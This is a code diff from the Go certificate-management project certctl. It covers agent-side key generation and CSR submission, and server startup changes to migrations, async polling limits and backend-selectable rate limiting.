}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
// I-004: same terminal-retirement handling as sendHeartbeat. Work-poll is the
|
||||||
|
// other hot path that can observe an agent's soft-retirement; if the
|
||||||
|
// heartbeat tick happens to fire after a work-poll tick within the same
|
||||||
|
// retirement window, this branch catches it first. markRetired's sync.Once
|
||||||
|
// guards idempotency so racing both paths in the same tick only closes the
|
||||||
|
// signal channel once. No consecutiveFailures increment — retirement is
|
||||||
|
// not a transient failure.
|
||||||
|
if resp.StatusCode == http.StatusGone {
|
||||||
|
body, _ := io.ReadAll(resp.Body)
|
||||||
|
a.markRetired("work_poll", resp.StatusCode, string(body))
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
if resp.StatusCode != http.StatusOK {
|
||||||
|
body, _ := io.ReadAll(resp.Body)
|
||||||
|
a.logger.Error("work poll rejected",
|
||||||
|
"status", resp.StatusCode,
|
||||||
|
"body", string(body))
|
||||||
|
a.consecutiveFailures++
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
var workResp WorkResponse
|
||||||
|
if err := json.NewDecoder(resp.Body).Decode(&workResp); err != nil {
|
||||||
|
a.logger.Error("failed to decode work response", "error", err)
|
||||||
|
a.consecutiveFailures++
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.consecutiveFailures = 0
|
||||||
|
|
||||||
|
if workResp.Count == 0 {
|
||||||
|
a.logger.Debug("no pending work")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("received work", "job_count", workResp.Count)
|
||||||
|
|
||||||
|
// Process each job based on type and status
|
||||||
|
for _, job := range workResp.Jobs {
|
||||||
|
switch {
|
||||||
|
case job.Status == "AwaitingCSR":
|
||||||
|
// Agent keygen mode: generate key locally, create CSR, submit to server
|
||||||
|
a.executeCSRJob(ctx, job)
|
||||||
|
case job.Type == "Deployment":
|
||||||
|
a.executeDeploymentJob(ctx, job)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// executeCSRJob handles an AwaitingCSR job: generates a private key locally, creates a CSR,
|
||||||
|
// and submits it to the control plane for signing. The private key is stored on the local
|
||||||
|
// filesystem with 0600 permissions and NEVER sent to the server.
|
||||||
|
//
|
||||||
|
// Flow:
|
||||||
|
// 1. Generate ECDSA P-256 key pair
|
||||||
|
// 2. Store private key to disk (keyDir/certID.key) with 0600 permissions
|
||||||
|
// 3. Create CSR with common name and SANs from work response
|
||||||
|
// 4. Submit CSR to control plane via POST /agents/{id}/csr
|
||||||
|
// 5. Server signs the CSR and creates a cert version + deployment jobs
|
||||||
|
func (a *Agent) executeCSRJob(ctx context.Context, job JobItem) {
|
||||||
|
a.logger.Info("executing CSR job (agent-side key generation)",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"certificate_id", job.CertificateID,
|
||||||
|
"common_name", job.CommonName)
|
||||||
|
|
||||||
|
// Step 1: Generate ECDSA P-256 key pair
|
||||||
|
privKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to generate private key",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key generation failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("generated ECDSA P-256 key pair locally",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"certificate_id", job.CertificateID)
|
||||||
|
|
||||||
|
// Step 2: Store private key to disk with secure permissions.
|
||||||
|
//
|
||||||
|
// Bundle-9 / Audit L-002 + L-003: marshal+write through helpers that
|
||||||
|
// (a) zeroize the in-heap DER buffer immediately after the PEM block is
|
||||||
|
// constructed so the private scalar's exposure window is bounded by
|
||||||
|
// this function call, and (b) assert the key directory is mode 0700
|
||||||
|
// before any write touches disk. Also defer-clear the PEM buffer for
|
||||||
|
// the same reason — the encoded key isn't sensitive in transit (it's
|
||||||
|
// going to disk) but lingers on the heap if we don't.
|
||||||
|
keyPath := filepath.Join(a.config.KeyDir, job.CertificateID+".key")
|
||||||
|
if err := ensureAgentKeyDirSecure(filepath.Dir(keyPath)); err != nil {
|
||||||
|
a.logger.Error("agent key dir hardening failed", "job_id", job.ID, "error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key dir hardening failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var privKeyPEM []byte
|
||||||
|
if marshalErr := marshalAgentKeyAndZeroize(privKey, func(der []byte) error {
|
||||||
|
privKeyPEM = pem.EncodeToMemory(&pem.Block{
|
||||||
|
Type: "EC PRIVATE KEY",
|
||||||
|
Bytes: der,
|
||||||
|
})
|
||||||
|
return nil
|
||||||
|
}); marshalErr != nil {
|
||||||
|
a.logger.Error("failed to marshal private key",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", marshalErr)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key marshal failed: %v", marshalErr)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
defer clear(privKeyPEM)
|
||||||
|
|
||||||
|
if err := os.WriteFile(keyPath, privKeyPEM, 0600); err != nil {
|
||||||
|
a.logger.Error("failed to write private key to disk",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"key_path", keyPath,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key storage failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("private key stored securely",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"key_path", keyPath,
|
||||||
|
"permissions", "0600")
|
||||||
|
|
||||||
|
// Validate common name is present
|
||||||
|
if job.CommonName == "" {
|
||||||
|
a.logger.Error("empty common name in CSR job", "job_id", job.ID)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", "empty common name"); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step 3: Create CSR with common name and SANs
|
||||||
|
// Split SANs into DNS names and email addresses for proper CSR encoding
|
||||||
|
var dnsNames []string
|
||||||
|
var emailAddresses []string
|
||||||
|
for _, san := range job.SANs {
|
||||||
|
if strings.Contains(san, "@") {
|
||||||
|
emailAddresses = append(emailAddresses, san)
|
||||||
|
} else {
|
||||||
|
dnsNames = append(dnsNames, san)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
csrTemplate := &x509.CertificateRequest{
|
||||||
|
Subject: pkix.Name{
|
||||||
|
CommonName: job.CommonName,
|
||||||
|
},
|
||||||
|
DNSNames: dnsNames,
|
||||||
|
EmailAddresses: emailAddresses,
|
||||||
|
}
|
||||||
|
|
||||||
|
csrDER, err := x509.CreateCertificateRequest(rand.Reader, csrTemplate, privKey)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to create CSR",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR creation failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
csrPEM := string(pem.EncodeToMemory(&pem.Block{
|
||||||
|
Type: "CERTIFICATE REQUEST",
|
||||||
|
Bytes: csrDER,
|
||||||
|
}))
|
||||||
|
|
||||||
|
// Step 4: Submit CSR to the control plane (only the public key leaves the agent)
|
||||||
|
a.logger.Info("submitting CSR to control plane",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"certificate_id", job.CertificateID)
|
||||||
|
|
||||||
|
submitPath := fmt.Sprintf("/api/v1/agents/%s/csr", a.config.AgentID)
|
||||||
|
resp, err := a.makeRequest(ctx, http.MethodPost, submitPath, map[string]string{
|
||||||
|
"csr_pem": csrPEM,
|
||||||
|
"certificate_id": job.CertificateID,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to submit CSR",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR submission failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
if resp.StatusCode != http.StatusAccepted {
|
||||||
|
body, _ := io.ReadAll(resp.Body)
|
||||||
|
a.logger.Error("CSR submission rejected",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"status", resp.StatusCode,
|
||||||
|
"body", string(body))
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR rejected: %s", string(body))); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("CSR submitted and signed successfully",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"certificate_id", job.CertificateID,
|
||||||
|
"key_path", keyPath)
|
||||||
|
}
|
||||||
+58
-667
@@ -5,8 +5,6 @@ package main
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"context"
|
"context"
|
||||||
"crypto"
|
|
||||||
"crypto/tls"
|
|
||||||
"crypto/x509"
|
"crypto/x509"
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"encoding/pem"
|
"encoding/pem"
|
||||||
@@ -29,13 +27,12 @@ import (
|
|||||||
"github.com/certctl-io/certctl/internal/auth/bootstrap"
|
"github.com/certctl-io/certctl/internal/auth/bootstrap"
|
||||||
"github.com/certctl-io/certctl/internal/auth/breakglass"
|
"github.com/certctl-io/certctl/internal/auth/breakglass"
|
||||||
oidcsvc "github.com/certctl-io/certctl/internal/auth/oidc"
|
oidcsvc "github.com/certctl-io/certctl/internal/auth/oidc"
|
||||||
oidcdomain "github.com/certctl-io/certctl/internal/auth/oidc/domain"
|
|
||||||
"github.com/certctl-io/certctl/internal/auth/session"
|
"github.com/certctl-io/certctl/internal/auth/session"
|
||||||
userdomain "github.com/certctl-io/certctl/internal/auth/user/domain"
|
|
||||||
"github.com/certctl-io/certctl/internal/config"
|
"github.com/certctl-io/certctl/internal/config"
|
||||||
discoveryawssm "github.com/certctl-io/certctl/internal/connector/discovery/awssm"
|
discoveryawssm "github.com/certctl-io/certctl/internal/connector/discovery/awssm"
|
||||||
discoveryazurekv "github.com/certctl-io/certctl/internal/connector/discovery/azurekv"
|
discoveryazurekv "github.com/certctl-io/certctl/internal/connector/discovery/azurekv"
|
||||||
discoverygcpsm "github.com/certctl-io/certctl/internal/connector/discovery/gcpsm"
|
discoverygcpsm "github.com/certctl-io/certctl/internal/connector/discovery/gcpsm"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/issuer/asyncpoll"
|
||||||
notifyemail "github.com/certctl-io/certctl/internal/connector/notifier/email"
|
notifyemail "github.com/certctl-io/certctl/internal/connector/notifier/email"
|
||||||
notifyopsgenie "github.com/certctl-io/certctl/internal/connector/notifier/opsgenie"
|
notifyopsgenie "github.com/certctl-io/certctl/internal/connector/notifier/opsgenie"
|
||||||
notifypagerduty "github.com/certctl-io/certctl/internal/connector/notifier/pagerduty"
|
notifypagerduty "github.com/certctl-io/certctl/internal/connector/notifier/pagerduty"
|
||||||
@@ -45,7 +42,6 @@ import (
|
|||||||
"github.com/certctl-io/certctl/internal/domain"
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
authdomainAlias "github.com/certctl-io/certctl/internal/domain/auth"
|
authdomainAlias "github.com/certctl-io/certctl/internal/domain/auth"
|
||||||
"github.com/certctl-io/certctl/internal/ratelimit"
|
"github.com/certctl-io/certctl/internal/ratelimit"
|
||||||
"github.com/certctl-io/certctl/internal/repository"
|
|
||||||
"github.com/certctl-io/certctl/internal/repository/postgres"
|
"github.com/certctl-io/certctl/internal/repository/postgres"
|
||||||
"github.com/certctl-io/certctl/internal/scep/intune"
|
"github.com/certctl-io/certctl/internal/scep/intune"
|
||||||
"github.com/certctl-io/certctl/internal/scheduler"
|
"github.com/certctl-io/certctl/internal/scheduler"
|
||||||
@@ -55,6 +51,13 @@ import (
|
|||||||
)
|
)
|
||||||
|
|
||||||
func main() {
|
func main() {
|
||||||
|
// Phase 4 DEPL-M1 closure (2026-05-14): --migrate-only flag for
|
||||||
|
// the Helm pre-install/pre-upgrade hook. Phase 9 Sprint 8b
|
||||||
|
// (2026-05-14) extracted the flag-parse + the migration-execution
|
||||||
|
// block to cmd/server/migrations.go; see that file's doc-comment
|
||||||
|
// for the full Phase 4 lifecycle rationale.
|
||||||
|
migrateOnly := parseMigrateOnlyFlag()
|
||||||
|
|
||||||
// Load configuration
|
// Load configuration
|
||||||
cfg, err := config.Load()
|
cfg, err := config.Load()
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -131,6 +134,19 @@ func main() {
|
|||||||
logger.Info("agent bootstrap token configured (length redacted; constant-time compare on POST /api/v1/agents)")
|
logger.Info("agent bootstrap token configured (length redacted; constant-time compare on POST /api/v1/agents)")
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 6 SCALE-M3 closure (2026-05-14): operator-overridable
|
||||||
|
// package-level default for the asyncpoll MaxWait fallback.
|
||||||
|
// Per-connector overrides (CERTCTL_DIGICERT_POLL_MAX_WAIT_SECONDS,
|
||||||
|
// CERTCTL_ENTRUST_POLL_MAX_WAIT_SECONDS, etc.) still win when set;
|
||||||
|
// this global env is the middle of the priority chain (above the
|
||||||
|
// 10-minute package default const, below per-connector overrides).
|
||||||
|
// See internal/connector/issuer/asyncpoll/asyncpoll.go for the
|
||||||
|
// SetDefaultMaxWait contract.
|
||||||
|
if v, _ := strconv.Atoi(os.Getenv("CERTCTL_ASYNC_POLL_MAX_WAIT_SECONDS")); v > 0 {
|
||||||
|
asyncpoll.SetDefaultMaxWait(time.Duration(v) * time.Second)
|
||||||
|
logger.Info("asyncpoll default max-wait override", "seconds", v)
|
||||||
|
}
|
||||||
|
|
||||||
// Initialize database connection pool.
|
// Initialize database connection pool.
|
||||||
//
|
//
|
||||||
// Bundle 3 closure (D12): pre-Bundle-3 the operator-facing
|
// Bundle 3 closure (D12): pre-Bundle-3 the operator-facing
|
||||||
@@ -146,47 +162,14 @@ func main() {
|
|||||||
defer db.Close()
|
defer db.Close()
|
||||||
logger.Info("connected to database")
|
logger.Info("connected to database")
|
||||||
|
|
||||||
// Run migrations
|
// Phase 4 DEPL-M1 + Phase 9 Sprint 8b — the migration-via-hook
|
||||||
logger.Info("running migrations", "path", cfg.Database.MigrationsPath)
|
// posture (Compose / Helm-with-hook / bare --migrate-only) lives
|
||||||
if err := postgres.RunMigrations(db, cfg.Database.MigrationsPath); err != nil {
|
// in runBootMigrations (cmd/server/migrations.go). Returns true
|
||||||
logger.Error("failed to run migrations", "error", err)
|
// when --migrate-only was set so we can return from main()
|
||||||
os.Exit(1)
|
// cleanly (deferred db.Close runs vs the pre-Sprint-8b os.Exit(0)
|
||||||
}
|
// which skipped defers — see migrations.go for the rationale).
|
||||||
logger.Info("migrations completed")
|
if exitAfterMigrations := runBootMigrations(cfg, db, logger, migrateOnly); exitAfterMigrations {
|
||||||
|
return
|
||||||
// Apply baseline seed data.
|
|
||||||
//
|
|
||||||
// U-3 (P1, cat-u-seed_initdb_schema_drift): pre-U-3 seed.sql was mounted
|
|
||||||
// into postgres `/docker-entrypoint-initdb.d/` alongside a hand-curated
|
|
||||||
// subset of migrations. Adding a migration that introduced a new column
|
|
||||||
// referenced by seed.sql (cat-o-retry_interval_unit_mismatch /
|
|
||||||
// policy_rules.severity / etc.) without also updating the compose volume
|
|
||||||
// mounts caused initdb to crash on first up. Post-U-3 the compose stack
|
|
||||||
// drops all initdb mounts; postgres comes up with empty schema, the
|
|
||||||
// server runs RunMigrations above, then this RunSeed call lands the
|
|
||||||
// baseline data — all from a single source of truth (this binary).
|
|
||||||
// See internal/repository/postgres/db.go::RunSeed for the contract.
|
|
||||||
logger.Info("applying baseline seed", "path", cfg.Database.MigrationsPath)
|
|
||||||
if err := postgres.RunSeed(db, cfg.Database.MigrationsPath); err != nil {
|
|
||||||
logger.Error("failed to apply seed data", "error", err)
|
|
||||||
os.Exit(1)
|
|
||||||
}
|
|
||||||
logger.Info("seed completed")
|
|
||||||
|
|
||||||
// Apply demo overlay seed when CERTCTL_DEMO_SEED=true. Pre-U-3 the demo
|
|
||||||
// overlay (deploy/docker-compose.demo.yml) mounted seed_demo.sql into
|
|
||||||
// postgres `/docker-entrypoint-initdb.d/`; that broke once U-3 dropped
|
|
||||||
// the initdb migration mounts (the demo seed references tables that
|
|
||||||
// wouldn't exist at initdb time). The runtime path here is the
|
|
||||||
// post-U-3 replacement. Default-off so a vanilla deploy never lands
|
|
||||||
// fake-history rows. See postgres.RunDemoSeed for the contract.
|
|
||||||
if cfg.Database.DemoSeed {
|
|
||||||
logger.Info("applying demo seed (CERTCTL_DEMO_SEED=true)", "path", cfg.Database.MigrationsPath)
|
|
||||||
if err := postgres.RunDemoSeed(db, cfg.Database.MigrationsPath); err != nil {
|
|
||||||
logger.Error("failed to apply demo seed data", "error", err)
|
|
||||||
os.Exit(1)
|
|
||||||
}
|
|
||||||
logger.Info("demo seed completed")
|
|
||||||
}
|
}
|
||||||
|
|
||||||
// Initialize repositories with real PostgreSQL connection
|
// Initialize repositories with real PostgreSQL connection
|
||||||
@@ -594,7 +577,7 @@ func main() {
|
|||||||
// AuthExemptRouterRoutes path. The service-layer Argon2id lockout
|
// AuthExemptRouterRoutes path. The service-layer Argon2id lockout
|
||||||
// state machine remains the second line of defense.
|
// state machine remains the second line of defense.
|
||||||
breakglassHandler.SetLoginRateLimiter(
|
breakglassHandler.SetLoginRateLimiter(
|
||||||
ratelimit.NewSlidingWindowLimiter(5, time.Minute, 50_000),
|
ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, 5, time.Minute, 50_000),
|
||||||
)
|
)
|
||||||
if cfg.Auth.Breakglass.Enabled {
|
if cfg.Auth.Breakglass.Enabled {
|
||||||
logger.Warn("CERTCTL_BREAKGLASS_ENABLED=true — break-glass admin path is ACTIVE; this bypasses SSO. Disable in steady-state.",
|
logger.Warn("CERTCTL_BREAKGLASS_ENABLED=true — break-glass admin path is ACTIVE; this bypasses SSO. Disable in steady-state.",
|
||||||
@@ -1017,7 +1000,7 @@ func main() {
|
|||||||
// Production hardening II Phase 3: per-source-IP OCSP rate limit.
|
// Production hardening II Phase 3: per-source-IP OCSP rate limit.
|
||||||
// Window 1m so the cap counts requests per minute. Map cap 50k
|
// Window 1m so the cap counts requests per minute. Map cap 50k
|
||||||
// matches the SCEP/Intune replay cache cap. Zero disables.
|
// matches the SCEP/Intune replay cache cap. Zero disables.
|
||||||
ocspLimiter := ratelimit.NewSlidingWindowLimiter(cfg.Scheduler.OCSPRateLimitPerIPMin, time.Minute, 50_000)
|
ocspLimiter := ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, cfg.Scheduler.OCSPRateLimitPerIPMin, time.Minute, 50_000)
|
||||||
certificateHandler.SetOCSPRateLimiter(ocspLimiter)
|
certificateHandler.SetOCSPRateLimiter(ocspLimiter)
|
||||||
issuerHandler := handler.NewIssuerHandler(issuerService)
|
issuerHandler := handler.NewIssuerHandler(issuerService)
|
||||||
targetHandler := handler.NewTargetHandler(targetService)
|
targetHandler := handler.NewTargetHandler(targetService)
|
||||||
@@ -1082,7 +1065,7 @@ func main() {
|
|||||||
exportHandler := handler.NewExportHandler(exportService)
|
exportHandler := handler.NewExportHandler(exportService)
|
||||||
// Production hardening II Phase 3: per-actor cert-export rate limit.
|
// Production hardening II Phase 3: per-actor cert-export rate limit.
|
||||||
// Window 1h so the cap counts exports per hour. Zero disables.
|
// Window 1h so the cap counts exports per hour. Zero disables.
|
||||||
exportLimiter := ratelimit.NewSlidingWindowLimiter(cfg.Scheduler.CertExportRateLimitPerActorHr, time.Hour, 50_000)
|
exportLimiter := ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, cfg.Scheduler.CertExportRateLimitPerActorHr, time.Hour, 50_000)
|
||||||
exportHandler.SetExportRateLimiter(exportLimiter)
|
exportHandler.SetExportRateLimiter(exportLimiter)
|
||||||
|
|
||||||
bulkRevocationHandler := handler.NewBulkRevocationHandler(bulkRevocationService)
|
bulkRevocationHandler := handler.NewBulkRevocationHandler(bulkRevocationService)
|
||||||
@@ -1226,6 +1209,29 @@ func main() {
|
|||||||
sched.SetSessionGarbageCollector(sessionService)
|
sched.SetSessionGarbageCollector(sessionService)
|
||||||
sched.SetBCLReplayGarbageCollector(bclReplayRepo) // Audit 2026-05-10 HIGH-3.
|
sched.SetBCLReplayGarbageCollector(bclReplayRepo) // Audit 2026-05-10 HIGH-3.
|
||||||
sched.SetSessionGCInterval(cfg.Auth.Session.GCInterval)
|
sched.SetSessionGCInterval(cfg.Auth.Session.GCInterval)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.3 closure (ARCH-M1): when the operator selected
|
||||||
|
// CERTCTL_RATE_LIMIT_BACKEND=postgres, wire the bucket janitor so
|
||||||
|
// stale rows from rate_limit_buckets get swept on the configured
|
||||||
|
// interval. The in-memory backend's prune-on-Allow path keeps
|
||||||
|
// buckets short-lived without a separate sweep, so we skip the
|
||||||
|
// loop entirely for backend=memory.
|
||||||
|
//
|
||||||
|
// maxWindow = 24h: the EST per-principal limiter is the longest
|
||||||
|
// window any current caller configures (the breakglass / OCSP /
|
||||||
|
// export / EST failed-basic limiters use shorter windows). Bump
|
||||||
|
// this if a new caller introduces a longer window — rows pruned
|
||||||
|
// inside their window aren't deletable.
|
||||||
|
if cfg.RateLimit.SlidingWindowBackend == "postgres" {
|
||||||
|
rateLimitGC := ratelimit.NewPostgresGC(db, 24*time.Hour)
|
||||||
|
sched.SetRateLimitGarbageCollector(rateLimitGC)
|
||||||
|
sched.SetRateLimitGCInterval(cfg.RateLimit.SlidingWindowJanitorInterval)
|
||||||
|
logger.Info("rate-limit GC sweep enabled (postgres backend)",
|
||||||
|
"interval", cfg.RateLimit.SlidingWindowJanitorInterval.String(),
|
||||||
|
"max_window", "24h")
|
||||||
|
} else {
|
||||||
|
logger.Info("rate-limit backend = memory; postgres GC sweep not wired (in-memory backend self-prunes)")
|
||||||
|
}
|
||||||
logger.Info("session GC sweep enabled",
|
logger.Info("session GC sweep enabled",
|
||||||
"interval", cfg.Auth.Session.GCInterval.String(),
|
"interval", cfg.Auth.Session.GCInterval.String(),
|
||||||
"absolute_timeout", cfg.Auth.Session.AbsoluteTimeout.String(),
|
"absolute_timeout", cfg.Auth.Session.AbsoluteTimeout.String(),
|
||||||
@@ -1549,7 +1555,7 @@ func main() {
|
|||||||
// release. The shared SlidingWindowLimiter applies the same
|
// release. The shared SlidingWindowLimiter applies the same
|
||||||
// math the SCEP/Intune limiter uses — extracted in Phase 4.1
|
// math the SCEP/Intune limiter uses — extracted in Phase 4.1
|
||||||
// of this bundle so both call sites share the implementation.
|
// of this bundle so both call sites share the implementation.
|
||||||
failed := ratelimit.NewSlidingWindowLimiter(10, time.Hour, 50_000)
|
failed := ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, 10, time.Hour, 50_000)
|
||||||
estHandler.SetSourceIPRateLimiter(failed)
|
estHandler.SetSourceIPRateLimiter(failed)
|
||||||
}
|
}
|
||||||
// Phase 2.1: mTLS sibling route. When MTLSEnabled=true, build a
|
// Phase 2.1: mTLS sibling route. When MTLSEnabled=true, build a
|
||||||
@@ -1605,7 +1611,7 @@ func main() {
|
|||||||
mtlsHandler.SetChannelBindingRequired(profile.ChannelBindingRequired)
|
mtlsHandler.SetChannelBindingRequired(profile.ChannelBindingRequired)
|
||||||
mtlsHandler.SetServerKeygenEnabled(profile.ServerKeygenEnabled)
|
mtlsHandler.SetServerKeygenEnabled(profile.ServerKeygenEnabled)
|
||||||
if profile.RateLimitPerPrincipal24h > 0 {
|
if profile.RateLimitPerPrincipal24h > 0 {
|
||||||
perPrincipal := ratelimit.NewSlidingWindowLimiter(profile.RateLimitPerPrincipal24h, 24*time.Hour, 100_000)
|
perPrincipal := ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, profile.RateLimitPerPrincipal24h, 24*time.Hour, 100_000)
|
||||||
mtlsHandler.SetPerPrincipalRateLimiter(perPrincipal)
|
mtlsHandler.SetPerPrincipalRateLimiter(perPrincipal)
|
||||||
}
|
}
|
||||||
estMTLSHandlers[profile.PathID] = mtlsHandler
|
estMTLSHandlers[profile.PathID] = mtlsHandler
|
||||||
@@ -1627,7 +1633,7 @@ func main() {
|
|||||||
// when configured). The mTLS handler above gets its own
|
// when configured). The mTLS handler above gets its own
|
||||||
// limiter instance so the two routes don't share a bucket.
|
// limiter instance so the two routes don't share a bucket.
|
||||||
if profile.RateLimitPerPrincipal24h > 0 {
|
if profile.RateLimitPerPrincipal24h > 0 {
|
||||||
perPrincipal := ratelimit.NewSlidingWindowLimiter(profile.RateLimitPerPrincipal24h, 24*time.Hour, 100_000)
|
perPrincipal := ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, profile.RateLimitPerPrincipal24h, 24*time.Hour, 100_000)
|
||||||
estHandler.SetPerPrincipalRateLimiter(perPrincipal)
|
estHandler.SetPerPrincipalRateLimiter(perPrincipal)
|
||||||
}
|
}
|
||||||
estHandlers[profile.PathID] = estHandler
|
estHandlers[profile.PathID] = estHandler
|
||||||
@@ -2275,618 +2281,3 @@ func main() {
|
|||||||
|
|
||||||
logger.Info("certctl server stopped")
|
logger.Info("certctl server stopped")
|
||||||
}
|
}
|
||||||
|
|
||||||
// preflightSCEPChallengePassword enforces the H-2 fix: if SCEP is enabled, a
|
|
||||||
// non-empty challenge password MUST be configured. Returns a non-nil error
|
|
||||||
// otherwise so the caller can refuse to start the control plane (CWE-306,
|
|
||||||
// missing authentication for a critical function).
|
|
||||||
//
|
|
||||||
// This helper is extracted so the check can be unit tested without booting
|
|
||||||
// the full server. The caller (main) is responsible for translating the
|
|
||||||
// returned error into a structured log line and os.Exit(1).
|
|
||||||
func preflightSCEPChallengePassword(enabled bool, challengePassword string) error {
|
|
||||||
if !enabled {
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
if challengePassword == "" {
|
|
||||||
return fmt.Errorf("SCEP enabled but CERTCTL_SCEP_CHALLENGE_PASSWORD is empty: " +
|
|
||||||
"SCEP enrollment would accept any client (CWE-306); " +
|
|
||||||
"configure a non-empty shared secret or set CERTCTL_SCEP_ENABLED=false")
|
|
||||||
}
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// preflightSCEPMTLSTrustBundle validates a per-profile mTLS client-CA
|
|
||||||
// trust bundle. SCEP RFC 8894 + Intune master bundle Phase 6.5.
|
|
||||||
//
|
|
||||||
// Mirrors preflightSCEPRACertKey's no-op-when-disabled pattern; otherwise
|
|
||||||
// the checks are:
|
|
||||||
//
|
|
||||||
// 1. Path is non-empty (the Validate() refuse covers this too, but
|
|
||||||
// preflight reports the specific failure with an actionable error
|
|
||||||
// string + os.Exit(1) at the call site).
|
|
||||||
// 2. File exists + readable.
|
|
||||||
// 3. PEM-decodes to ≥1 CERTIFICATE block.
|
|
||||||
// 4. None of the bundled certs is past NotAfter — an expired trust
|
|
||||||
// anchor would silently reject every client cert at runtime.
|
|
||||||
//
|
|
||||||
// On success, returns the parsed *x509.CertPool ready to inject into the
|
|
||||||
// per-profile SCEPHandler via SetMTLSTrustPool. Each bundled cert also
|
|
||||||
// contributes to the union pool that backs the TLS-layer
|
|
||||||
// VerifyClientCertIfGiven.
|
|
||||||
func preflightSCEPMTLSTrustBundle(enabled bool, bundlePath string) (*x509.CertPool, error) {
|
|
||||||
if !enabled {
|
|
||||||
return nil, nil
|
|
||||||
}
|
|
||||||
if bundlePath == "" {
|
|
||||||
return nil, fmt.Errorf("MTLS enabled but trust bundle path empty: " +
|
|
||||||
"set CERTCTL_SCEP_PROFILE_<NAME>_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH to a PEM file " +
|
|
||||||
"containing the bootstrap-CA certs the operator allows to enroll")
|
|
||||||
}
|
|
||||||
body, err := os.ReadFile(bundlePath)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("read MTLS trust bundle: %w (path=%s)", err, bundlePath)
|
|
||||||
}
|
|
||||||
pool := x509.NewCertPool()
|
|
||||||
rest := body
|
|
||||||
count := 0
|
|
||||||
now := time.Now()
|
|
||||||
for {
|
|
||||||
var block *pem.Block
|
|
||||||
block, rest = pem.Decode(rest)
|
|
||||||
